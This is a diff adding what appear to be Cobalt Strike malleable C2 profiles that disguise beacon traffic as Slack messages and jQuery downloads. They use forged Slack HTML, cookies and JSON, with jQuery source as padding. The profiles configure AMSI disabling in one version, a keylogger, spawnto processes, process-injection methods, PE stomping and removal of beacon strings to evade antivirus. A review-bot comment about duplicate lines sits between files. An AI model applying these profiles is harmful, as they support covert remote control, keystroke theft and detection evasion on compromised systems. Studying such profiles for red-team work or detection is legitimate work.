     99 + Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>
     100 + </div>
     101 + 
     102 + <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">
     103 + We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\">
     104 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •
     105 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •
     106 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>
     107 + </span>
     108 + </div>";
     109 + 
     110 + print;
     111 + }
     112 + }
     113 +}
     114 + 
     115 +http-post {
     116 +
     117 + set uri "/api/api.test";
     118 + 
     119 + client {
     120 + 
     121 +# header "Host" "msdevchat.slack.com";
     122 + header "Accept" "*/*";
     123 + header "Accept-Language" "en-US";
     124 +
     125 + output {
     126 + base64url;
     127 +
     128 + append ";_ga=GA1.2.875";
     129 + append "__ar_v4=%8867UMDGS643";
     130 + prepend "d=";
     131 +# prepend "cvo_sid1=R456BNMD64;";
     132 + prepend "_ga=GA1.2.875;";
     133 + prepend "b=.12vPkW22o;";
     134 + header "Cookie";
     135 + 
     136 + 
     137 + }
     138 + 
     139 + 
     140 + id {
     141 +#not sure on this, just trying to blend it in.
     142 + base64url;
     143 + prepend "GA1.";
     144 + header "_ga";
     145 + 
     146 + }
     147 + }
     148 + 
     149 + server {
     150 + 
     151 + header "Content-Type" "application/json; charset=utf-8";
     152 + header "Connection" "close";
     153 + header "Server" "Apache";
     154 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     155 + header "Referrer-Policy" "no-referrer";
     156 + header "X-Content-Type-Options" "nosniff";
     157 + header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
     158 + header "X-XSS-Protection" "0";
     159 + header "X-Slack-Backend" "h";
     160 + header "Vary" "Accept-Encoding";
     161 + header "Access-Control-Allow-Origin" "*";
     162 + header "X-Via" "haproxy-www-6g1x";
     163 +
     164 + 
     165 + output {
     166 + base64;
     167 + 
     168 + prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
     169 + append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
     170 + 
     171 + print;
     172 + }
     173 + }
     174 +}
     175 + 
     176 +http-stager {
     177 + 
     178 + set uri_x86 "/messages/DALBNSf25";
     179 + set uri_x64 "/messages/DALBNSF25";
     180 + 
     181 + client {
     182 + header "Accept" "*/*";
     183 + header "Accept-Language" "en-US,en;q=0.5";
     184 + header "Accept-Encoding" "gzip, deflate";
     185 + header "Connection" "close";
     186 + }
     187 + 
     188 + server {
     189 + header "Content-Type" "text/html; charset=utf-8";
     190 + header "Connection" "close";
     191 + header "Server" "Apache";
     192 + header "X-XSS-Protection" "0";
     193 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     194 + header "Referrer-Policy" "no-referrer";
     195 + header "X-Slack-Backend" "h";
     196 + header "Pragma" "no-cache";
     197 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     198 + header "X-Frame-Options" "SAMEORIGIN";
     199 + header "Vary" "Accept-Encoding";
     200 + header "X-Via" "haproxy-www-suhx";
     201 +
     202 + }
     203 + 
     204 + 
     205 +}
     206 + 
     207 +###Malleable PE Options###
     208 + 
     209 +post-ex {
     210 + 
     211 + set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
     212 + set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
     213 + 
     214 + set obfuscate "true";
     215 + 
     216 + set smartinject "true";
     217 + 
     218 + set amsi_disable "true";
     219 + 
     220 +}
     221 + 
     222 +#used peclone on wwanmm.dll.
     223 +#don't use 'set image_size_xx' if using 'set module_xx'
     224 +stage {
     225 + set checksum "0";
     226 + set compile_time "25 Oct 2016 01:57:23";
     227 + set entry_point "170000";
     228 +# set image_size_x86 "6586368";
     229 +# set image_size_x64 "6586368";
     230 +# set name "WWanMM.dll";
     231 + set userwx "false";
     232 + set cleanup "true";
     233 + set stomppe "true";
     234 + set obfuscate "true";
     235 + set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
     236 + 
     237 + 
     238 +#module stomp
     239 + 
     240 +#don't use 'set image_size_xx' if using 'set module_xx'
     241 + set module_x86 "wwanmm.dll";
     242 + set module_x64 "wwanmm.dll";
     243 + 
     244 + transform-x86 {
     245 + prepend "\x90\x90\x90";
     246 + strrep "ReflectiveLoader" "";
     247 + strrep "beacon.dll" "";
     248 + }
     249 + 
     250 + transform-x64 {
     251 + prepend "\x90\x90\x90";
     252 + strrep "ReflectiveLoader" "";
     253 + strrep "beacon.x64.dll" "";
     254 + }
     255 + 
     256 +}
     257 +process-inject {
     258 + 
     259 + set allocator "NtMapViewOfSection";
     260 + 
     261 + set min_alloc "16700";
     262 + 
     263 + set userwx "false";
     264 +
     265 + set startrwx "true";
     266 +
     267 + transform-x86 {
     268 + prepend "\x90\x90\x90";
     269 + }
     270 + transform-x64 {
     271 + prepend "\x90\x90\x90";
     272 + }
     273 + 
     274 + execute {
     275 + CreateThread "ntdll!RtlUserThreadStart";
     276 + CreateThread;
     277 + NtQueueApcThread;
     278 + CreateRemoteThread;
     279 + RtlCreateUserThread;
     280 + }
     281 +}
     282 + 
    Profiles/Slack/slack_modified.profile
     1 +#slack profile
     2 +#used a MS dev group from a 'top slack groups' list
     3 +#xx0hcd
     4 +#Modified by Kleiton Kurti (@kleiton0x7e)
     5 + 
     6 +set host_stage "false"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.
     7 +set sleeptime "30000";
     8 +set jitter "20";
     9 +set useragent "<RAND>"; # "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"; Use random Internet Explorer UA by default
     10 +set dns_idle "8.8.8.8";
     11 +set maxdns "235";
     12 + 
     13 +#custom cert
     14 +#https-certificate {
     15 +# set keystore "your_store_file.store";
     16 +# set password "your_store_pass";
     17 +#}
     18 + 
     19 +http-config {
     20 +# set headers "Server, Content-Type, Cache-Control, Connection";
     21 +# header "Content-Type" "text/html;charset=UTF-8";
     22 +# header "Connection" "close";
     23 +# header "Cache-Control" "max-age=2";
     24 +# header "Server" "nginx";
     25 + #set "true" if teamserver is behind redirector
     26 + set trust_x_forwarded_for "false";
     27 +}
     28 + 
     29 +http-get {
     30 + 
     31 + set uri "/messages/A1537B0GM";
     32 +
     33 + client {
     34 + 
     35 +# header "Host" "msdevchat.slack.com";
     36 + header "Accept" "*/*";
     37 + header "Accept-Language" "en-US";
     38 + header "Connection" "close";
     39 +
     40 +
     41 + metadata {
     42 + base64url;
     43 +
     44 + append ";_ga=GA1.2.875";
     45 + append ";__ar_v4=%8867UMDGS643";
     46 + prepend "d=";
     47 +# prepend "cvo_sid1=R456BNMD64;";
     48 + prepend "_ga=GA1.2.875;";
     49 + prepend "b=.12vPkW22o;";
     50 + header "Cookie";
     51 + 
     52 + }
     53 + 
     54 + }
     55 + 
     56 + server {
     57 + 
     58 + header "Content-Type" "text/html; charset=utf-8";
     59 + header "Connection" "close";
     60 + header "Server" "Apache";
     61 + header "X-XSS-Protection" "0";
     62 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     63 + header "Referrer-Policy" "no-referrer";
     64 + header "X-Slack-Backend" "h";
     65 + header "Pragma" "no-cache";
     66 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     67 + header "X-Frame-Options" "SAMEORIGIN";
     68 + header "Vary" "Accept-Encoding";
     69 + header "X-Via" "haproxy-www-w6k7";
     70 +
     71 + 
     72 + output {
     73 + 
     74 + base64url;
     75 + 
     76 + prepend "<!DOCTYPE html>
     77 +<html lang=\"en-US\" class=\"supports_custom_scrollbar\">
     78 + 
     79 + <head>
     80 + 
     81 +<meta charset=\"utf-8\">
     82 +<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">
     83 +<meta name=\"referrer\" content=\"no-referrer\">
     84 +<meta name=\"superfish\" content=\"nofish\">
     85 + <title>Microsoft Developer Chat Slack</title>
     86 + <meta name=\"author\" content=\"Slack\">
     87 +
     88 + 
     89 + <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";
     90 + 
     91 + append "\"> </script>";
     92 +
     93 + append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">
     94 + 
     95 +
     96 +<div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">
     97 + <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>
     98 + 
     99 + <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">
     100 + Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>
     101 + </div>
     102 + 
     103 + <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">
     104 + We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\">
     105 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •
     106 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •
     107 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>
     108 + </span>
     109 + </div>";
     110 + 
     111 + print;
     112 + }
     113 + }
     114 +}
     115 + 
     116 +http-post {
     117 +
     118 + set uri "/api/api.test";
     119 + 
     120 + client {
     121 + 
     122 +# header "Host" "msdevchat.slack.com";
     123 + header "Accept" "*/*";
     124 + header "Accept-Language" "en-US";
     125 +
     126 + output {
     127 + base64url;
     128 +
     129 + append ";_ga=GA1.2.875";
     130 + append "__ar_v4=%8867UMDGS643";
     131 + prepend "d=";
     132 +# prepend "cvo_sid1=R456BNMD64;";
     133 + prepend "_ga=GA1.2.875;";
     134 + prepend "b=.12vPkW22o;";
     135 + header "Cookie";
     136 + 
     137 + 
     138 + }
     139 + 
     140 + 
     141 + id {
     142 +#not sure on this, just trying to blend it in.
     143 + base64url;
     144 + prepend "GA1.";
     145 + header "_ga";
     146 + 
     147 + }
     148 + }
     149 + 
     150 + server {
     151 + 
     152 + header "Content-Type" "application/json; charset=utf-8";
     153 + header "Connection" "close";
     154 + header "Server" "Apache";
     155 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     156 + header "Referrer-Policy" "no-referrer";
     157 + header "X-Content-Type-Options" "nosniff";
     158 + header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
     159 + header "X-XSS-Protection" "0";
     160 + header "X-Slack-Backend" "h";
     161 + header "Vary" "Accept-Encoding";
     162 + header "Access-Control-Allow-Origin" "*";
     163 + header "X-Via" "haproxy-www-6g1x";
     164 +
     165 + 
     166 + output {
     167 + base64;
     168 + 
     169 + prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
     170 + append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
     171 + 
     172 + print;
     173 + }
     174 + }
     175 +}
     176 + 
     177 +http-stager {
     178 + 
     179 + set uri_x86 "/messages/DBLANIF13";
     180 + set uri_x64 "/messages/DBLANIF13";
     181 + 
     182 + client {
     183 + header "Accept" "*/*";
     184 + header "Accept-Language" "en-US,en;q=0.5";
     185 + header "Accept-Encoding" "gzip, deflate";
     186 + header "Connection" "close";
     187 + }
     188 + 
     189 + server {
     190 + header "Content-Type" "text/html; charset=utf-8";
     191 + header "Connection" "close";
     192 + header "Server" "Apache";
     193 + header "X-XSS-Protection" "0";
     194 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     195 + header "Referrer-Policy" "no-referrer";
     196 + header "X-Slack-Backend" "h";
     197 + header "Pragma" "no-cache";
     198 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     199 + header "X-Frame-Options" "SAMEORIGIN";
     200 + header "Vary" "Accept-Encoding";
     201 + header "X-Via" "haproxy-www-suhx";
     202 +
     203 + }
     204 + 
     205 + 
     206 +}
     207 + 
     208 +###Malleable PE Options###
     209 +###Post-Ex Block###
     210 +post-ex {
     211 + set spawnto_x86 "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding";
     212 + set spawnto_x64 "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding";
     213 + set obfuscate "true";
     214 + set smartinject "true";
     215 + set amsi_disable "false";
     216 + set keylogger "GetAsyncKeyState";
     217 + #set threadhint "module!function+0x##"
     218 +}
     219 + 
     220 +#used peclone on wwanmm.dll.
     221 +#don't use 'set image_size_xx' if using 'set module_xx'
     222 +###Malleable PE/Stage Block###
     223 +stage {
     224 + set checksum "0";
     225 + set compile_time "5 May 2023 10:52:15";
     226 + set entry_point "170000";
     227 + #set image_size_x86 "6586368";
     228 + #set image_size_x64 "6586368";
     229 + set name "srv.dll";
     230 + set magic_mz_x64 "OOPS";
     231 + set magic_mz_x86 "OOPS";
     232 + set userwx "false";
     233 + set cleanup "true";
     234 + set sleep_mask "true";
     235 + set stomppe "true";
     236 + set obfuscate "true";
     237 + set rich_header "\xe5\xdc\xe0\xbf\x7f\xf9\x78\x26\x9a\x8c\x1b\x50\x87\x38\x89\x6b\x0d\x83\x71\xc4\xa9\xd0\x73\x20\xe2\x75\x4c\xd9\xa4\x8d\x5a\xc7\xea\xc8\x4e\x7e\x9a\x7c\xd9\xfa\xe9\x11\x0f\x3b\xb1\x70\x54\x94\x78\xde\x70\x41\x0f\x44\xa9\x4c";
     238 + set sleep_mask "true";
     239 +
     240 + set smartinject "true";
     241 +
     242 + #set allocator "HeapAlloc";
     243 + set magic_pe "EA";
     244 + 
     245 + set module_x86 "wwanmm.dll";
     246 + set module_x64 "wwanmm.dll";
     247 + 
     248 + transform-x86 {
     249 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     250 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     251 + strrep "ReflectiveLoader" "";
     252 + strrep "beacon.dll" "";
     253 + strrep "beacon.dll" ""; # Remove this text
     254 + strrep "msvcrt.dll" "";
     255 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     256 + }
     257 + 
     258 + transform-x64 {
     259 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     260 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     261 + strrep "ReflectiveLoader" "";
     262 + strrep "beacon.x64.dll" "";
     263 + strrep "beacon.dll" ""; # Remove this text
     264 + strrep "msvcrt.dll" "";
     265 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     266 + strrep "Stack around the variable" "";
     267 + strrep "was corrupted." "";
     268 + strrep "The variable" "";
     269 + strrep "is being used without being initialized." "";
     270 + strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
     271 + strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
     272 + strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
     273 + strrep "Stack memory was corrupted" "";
     274 + strrep "A local variable was used before it was initialized" "";
     275 + strrep "Stack memory around _alloca was corrupted" "";
     276 + strrep "Unknown Runtime Check Error" "";
     277 + strrep "Unknown Filename" "";
     278 + strrep "Unknown Module Name" "";
     279 + strrep "Run-Time Check Failure" "";
     280 + strrep "Stack corrupted near unknown variable" "";
     281 + strrep "Stack pointer corruption" "";
     282 + strrep "Cast to smaller type causing loss of data" "";
     283 + strrep "Stack memory corruption" "";
     284 + strrep "Local variable used before initialization" "";
     285 + strrep "Stack around" "corrupted";
     286 + strrep "operator" "";
     287 + strrep "operator co_await" "";
     288 + strrep "operator<=>" "";
     289 + }
     290 +}
     291 + 
     292 +###Process Inject Block###
     293 +process-inject {
     294 + set allocator "NtMapViewOfSection";
     295 + set bof_allocator "VirtualAlloc";
     296 + set bof_reuse_memory "true";
     297 + set min_alloc "16700";
     298 + set userwx "false";
     299 + set startrwx "false";
     300 +
     301 + transform-x86 {
     302 + prepend "\x0f\x1f\x00\x87\xd2\x42\x0f\x1f\x04\x00\x66\x0f\x1f\x04\x00\x66\x87\xdb\x46\x49\x4c\x41\x66\x87\xc9\x87\xdb\x90\x0f\x1f\x00\x66\x87\xd2\x40\x87\xc9\x47\x66\x90\x40\x48\x44\x0f\x1f\x00\x43\x45";
     303 + }
     304 + transform-x64 {
     305 + prepend "\x0f\x1f\x00\x87\xd2\x42\x0f\x1f\x04\x00\x66\x0f\x1f\x04\x00\x66\x87\xdb\x46\x49\x4c\x41\x66\x87\xc9\x87\xdb\x90\x0f\x1f\x00\x66\x87\xd2\x40\x87\xc9\x47\x66\x90\x40\x48\x44\x0f\x1f\x00\x43\x45";
     306 + }
     307 + 
     308 + execute {
     309 + #CreateThread;
     310 + #CreateRemoteThread;
     311 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     312 + SetThreadContext;
     313 + NtQueueApcThread-s;
     314 + #NtQueueApcThread;
     315 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     316 + CreateRemoteThread;
     317 + RtlCreateUserThread;
     318 + }
     319 +}
     320 + 
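Review bot: `set sleep_mask "true";` is declared twice in the stage block (file lines 234 and 238), and transform-x86 repeats `strrep "beacon.dll" "";` on consecutive lines 252–253; the second copies are dead and should be dropped. Lines 287–288 (`strrep "operator co_await" "";` and `strrep "operator<=>" "";`) are likewise redundant, since line 286 has already removed every `operator` substring (assuming strrep replaces all occurrences). The same duplicated settings and strrep lines appear in the stage block of Profiles/jquery/jquery.profile in this commit. The commented `#set threadhint "module!function+0x##"` on line 217 spells the option differently from the `set thread_hint` used in jquery.profile; the comment should use one spelling or be removed so it does not mislead the next editor.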
    Profiles/jquery/jquery.profile
     1 +#Author: Kleiton Kurti (@kleiton0x7e) & John Stigerwalt (@jstigerwalt1)
     2 + 
     3 +### Auxiliary Settings ###
     4 +set sample_name "Stigs Random C2 Profile";
     5 +set host_stage "false"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.
     6 +set useragent "<RAND>"; # "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"; Use random Internet Explorer UA by default
     7 +set create_remote_thread "true"; # Allow beacon to create threads in other processes
     8 +set hijack_remote_thread "true"; # Allow beacon to run jobs by hijacking the primary thread of a suspeneded process
     9 + 
     10 +### Beacon Sleep Settings ###
     11 +set sleeptime "3000";
     12 +set jitter "33"; # Default jitter factor (0-99%)
     13 + 
     14 +### SMB Options ###
     15 +set pipename "Winsock2\\CatalogChangeListener-###-0";
     16 +set pipename_stager "TSVCPIPE-########-####-4###-####-############";
     17 + 
     18 +### SSH BANNER ###
     19 +set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
     20 +set ssh_pipename "SearchTextHarvester##";
     21 + 
     22 +### Steal Token ###
     23 +set steal_token_access_mask "11";
     24 + 
     25 +### Proxy Options ###
     26 +set tasks_max_size "3604500";
     27 +#set tasks_proxy_max_size "921600";
     28 +#set tasks_dns_proxy_max_size "71680";
     29 + 
     30 + 
     31 +### Main HTTP Config Settings ###
     32 +http-config {
     33 + set headers "Date, Server, Content-Length, Keep-Alive, Contentnection, Content-Type";
     34 + header "Server" "Apache";
     35 + header "Keep-Alive" "timeout=10, max=100";
     36 + header "Connection" "Keep-Alive";
     37 + set trust_x_forwarded_for "true";
     38 + set block_useragents "curl*,lynx*,wget*";
     39 +}
     40 + 
     41 + 
     42 +### HTTPS Cert Settings ###
     43 + 
     44 +https-certificate {
     45 +# Self Signed Certificate Options
     46 +# set CN "*.azureedge.net";
     47 +# set O "Microsoft Corporation";
     48 +# set C "US";
     49 +# set L "Redmond";
     50 +# set ST "WA";
     51 +# set OU "Organizational Unit";
     52 +# set validity "365";
     53 + 
     54 +# Imported Certificate Options
     55 +# set keystore "domain.store";
     56 +# set password "password";
     57 +}
     58 + 
     59 +# code-signer {
     60 +# set keystore "keystore.jks";
     61 +# set password "password";
     62 +# set alias "server";
     63 +# set digest_algorithm "SHA256";
     64 +# set timestamp "false";
     65 +# set timestamp_url "http://timestamp.digicert.com";
     66 +#}
     67 + 
     68 +### Post Exploitation Settings ###
     69 +post-ex {
     70 + set spawnto_x86 "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding";
     71 + set spawnto_x64 "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding";
     72 + set obfuscate "true";
     73 + set smartinject "true";
     74 + set amsi_disable "false";
     75 + set keylogger "GetAsyncKeyState";
     76 + set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
     77 +}
     78 + 
     79 +### Process Injection ###
     80 +process-inject {
     81 + set allocator "NtMapViewOfSection"; # or VirtualAllocEx
     82 + set bof_allocator "VirtualAlloc";
     83 + set bof_reuse_memory "true";
     84 + set min_alloc "24576";
     85 + set startrwx "false";
     86 + set userwx "false";
     87 + 
     88 + transform-x86 {
     89 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     90 + }
     91 + transform-x64 {
     92 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     93 + }
     94 + 
     95 + execute {
     96 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     97 + NtQueueApcThread-s;
     98 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     99 + CreateRemoteThread;
     100 + RtlCreateUserThread;
     101 + SetThreadContext;
     102 + }
     103 +}
     104 + 
     105 + 
     106 +http-get {
     107 + set verb "GET"; # GET / POST
     108 + set uri "/css3/index2.shtml"; # Can be space separated string. Each beacon will be assigned one of these when the stage is built
     109 + 
     110 + client {
     111 + header "Accept" "text/html, application/xhtml+xml, image/jxr, */*";
     112 + header "Accept-Encoding" "gzip, deflate";
     113 + header "Accept-Language" "en-US; q=0.7, en; q=0.3";
     114 + header "Connection" "keep-alive";
     115 + header "DNT" "1";
     116 + 
     117 + metadata {
     118 + base64url;
     119 + parameter "accept";
     120 + }
     121 + }
     122 + 
     123 + server {
     124 + header "Content-Type" "application/yin+xml";
     125 + header "Server" "IBM_HTTP_Server/6.0.2.19 Apache/2.0.47 (Unix) DAV/2";
     126 + 
     127 + output{
     128 + base64;
     129 + print;
     130 + }
     131 + }
     132 +}
     133 + 
     134 +http-post {
     135 + set verb "POST"; # GET / POST
     136 + set uri "/tools/family.html";
     137 + client {
     138 + header "Accept" "text/html, application/xhtml+xml, */*";
     139 + header "Accept-Encoding" "gzip, deflate";
     140 + header "DNT" "1";
     141 + header "Content-Type" "application/x-www-form-urlencoded";
     142 + 
     143 + id {
     144 + base64;
     145 + prepend "token=";
     146 + header "Cookie";
     147 + }
     148 + 
     149 + output{
     150 + base64url;
     151 + prepend "input=";
     152 + print;
     153 + }
     154 + }
     155 + 
     156 + server {
     157 + header "Content-Type" "text/vnd.fly";
     158 + header "Server" "IBM_HTTP_Server/6.0.2.19 Apache/2.0.47 (Unix) DAV/2";
     159 + 
     160 + output {
     161 + base64;
     162 + print;
     163 + }
     164 + }
     165 +}
     166 + 
     167 + 
     168 +### Start of Real HTTP GET and POST settings ###
     169 + 
     170 +http-get "msrpc-azure" { # Don't think of this in terms of HTTP POST, as a beacon transaction of pushing data to the server
     171 + 
     172 + set uri "/compare/v1.44/VXK7P0GBE8"; # URI used for GET requests
     173 + set verb "GET";
     174 + 
     175 + client {
     176 + 
     177 + header "Accept" "image/*, application/json, text/html";
     178 + header "Accept-Language" "nb";
     179 + header "Accept-Encoding" "br, compress";
     180 + header "Access-X-Control" "True";
     181 + 
     182 + metadata {
     183 + mask; # Transform type
     184 + base64url; # Transform type
     185 + prepend "SESSIONID_XVQD0C55VSGX3JM="; # Cookie value
     186 + header "Cookie"; # Cookie header
     187 + }
     188 + }
     189 + 
     190 + server {
     191 + 
     192 + header "Server" "Microsoft-IIS/10.0";
     193 + header "X-Powered-By" "ASP.NET";
     194 + header "Cache-Control" "max-age=0, no-cache";
     195 + header "Pragma" "no-cache";
     196 + header "Connection" "keep-alive";
     197 + header "Content-Type" "application/javascript; charset=utf-8";
     198 + output {
     199 + mask; # Transform type
     200 + base64url; # Transform type
     201 + prepend "/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */ !function(a,b){'object'==typeof module&&'object'==typeof module.exp orts?module.exports=a.document?b(a,!0):function(a){if(!a.document)th row new Error('jQuery requires a window with a document');return b(a )}:b(a)}('undefined'!=typeof window?window:this,function(a,b){var c= [],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.t oString,k=i.hasOwnProperty,l={},m='2.2.4',n=function(a,b){return new n.fn.init(a,b)},o=/^[suFEFFxA0]+|[suFEFFxA0]+$/g,p=/^-ms-/,q=/- ([da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype ={jquery:m,constructor:n,selector:'',length:0,toArray:function(){retu rn e.call(this)},get:function(a){return null!=a?0>a?this[a+this.lengt h]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.con structor(),a);return b.prevObject=this,b.context=this.context,b},each:";
     202 + append "/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */ !function(e,t){'use strict';'object'==typeof module&&'object'==typeof module.exports? module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error('jQuery requires a window with a document');return t(e)}:t(e)}('undefined'!=typeof window?window :this,function(C,e){'use strict';var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice ,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l= a.call(Object),y={},m=function(e){return'function'==typeof e&&'number'!=typeof e.nodeType} ,x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};fun ction b(e,t,n){var r,i,o=(n=n||E).createElement('script');if(o.text=e,t)for(r in c)(i=t[ r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode;";
     203 + print;
     204 + }
     205 + 
     206 + }
     207 +}
     208 + 
     209 +http-post "msrpc-azure" { # Don't think of this in terms of HTTP POST, as a beacon transaction of pushing data to the server
     210 + 
     211 + set uri "/Construct/v1.85/JDX894ZM2WF1"; # URI used for POST block.
     212 + set verb "POST"; # HTTP verb used in POST block. Can be GET or POST
     213 + 
     214 + client {
     215 + 
     216 + header "Accept" "application/xml, application/xhtml+xml, application/json";
     217 + header "Accept-Language" "tn";
     218 + header "Accept-Encoding" "identity, *";
     219 + header "Access-X-Control" "True";
     220 + 
     221 + id {
     222 + mask; # Transform type
     223 + netbiosu; # Transform type
     224 + parameter "_KZZUEUVN";
     225 + }
     226 + 
     227 + output {
     228 + mask; # Transform type
     229 + netbios; # Transform type
     230 + print;
     231 + }
     232 + }
     233 + 
     234 + server {
     235 + 
     236 + header "Server" "Microsoft-IIS/10.0";
     237 + header "X-Powered-By" "ASP.NET";
     238 + header "Cache-Control" "max-age=0, no-cache";
     239 + header "Pragma" "no-cache";
     240 + header "Connection" "keep-alive";
     241 + header "Content-Type" "application/javascript; charset=utf-8";
     242 + 
     243 + output {
     244 + mask; # Transform type
     245 + netbiosu; # Transform type
